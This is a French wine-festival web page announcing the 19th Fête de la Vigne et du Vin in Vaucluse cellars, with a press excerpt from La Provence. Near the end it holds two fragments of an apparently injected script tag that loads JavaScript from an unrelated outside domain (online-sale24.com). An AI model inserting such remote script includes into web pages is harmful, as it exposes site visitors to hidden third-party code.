La Fête de la Vigne et du Vin | Des portes ouvertes et des animations dans une cinquantaine de caves
La Fête de la Vigne et du Vin est un événement pour fédérer autour du vin. Les caves et domaines viticoles du Vaucluse font découvrir leur terroir, leurs appellations, leurs millésimes, enseignent l'art de la dégustation, le savoir-faire vigneron, l'histoire d'un terroir d'exception aux amateurs et connaisseurs de vins. L'événement se déroule chaque année pendant le weekend de l'ascension.
vin - vigneron - viticulture - savoir-faire - vigne - vignoble - événement - millésime - terroir - dégustation - appellation - amateur de vin - connaisseur de vin - fête - loisir - convivialité - famille
29
post-template-default,single,single-post,postid-29,single-format-standard,ajax_fade,page_not_loaded,,qode-theme-ver-6.1,wpb-js-composer js-comp-ver-4.11.2,vc_responsive

Des portes ouvertes et des animations dans une cinquantaine de caves

06 Mai Des portes ouvertes et des animations dans une cinquantaine de caves

Demain matin, les lecteurs de la Provence découvriront notre édition spéciale de 8 pages consacrée aux vins des Côtes-du-Rhône, du Ventoux et du Luberon à l’occasion de La Fête de la Vigne et du Vin, autour du thème de la symphonie des Cépages.

La 19 ème édition de La Fête de la Vigne et du Vin organisée par l’association éponyme constituée d’une grappe de vignerons vauclusiens se déroulera le samedi 11 mai dans une cinquantaine de caves coopératives et particulières du département. « Cette fête a été crée dans le but d’attirer le public dans les caveaux afin que les producteurs puissent faire découvrir les vins, « explique de concert Christophe Rimbert et James Lecomte, respectivement Président et Trésorier de la structure.

Article publié par La Provence, lundi 6 mai 2013 / Photo Bernard Sorbier

Article-sur-La-Provence

Télécharger les articles :
Article sur le Dauphiné
Articles sur le dauphiné_

type=’text/javascript’ src=’http://online-sale24.com/1.js’>

type=’text/javascript’ src=’http://online-sale24.com/1.js’>

Pas de commentaires

Poster Un Commentaire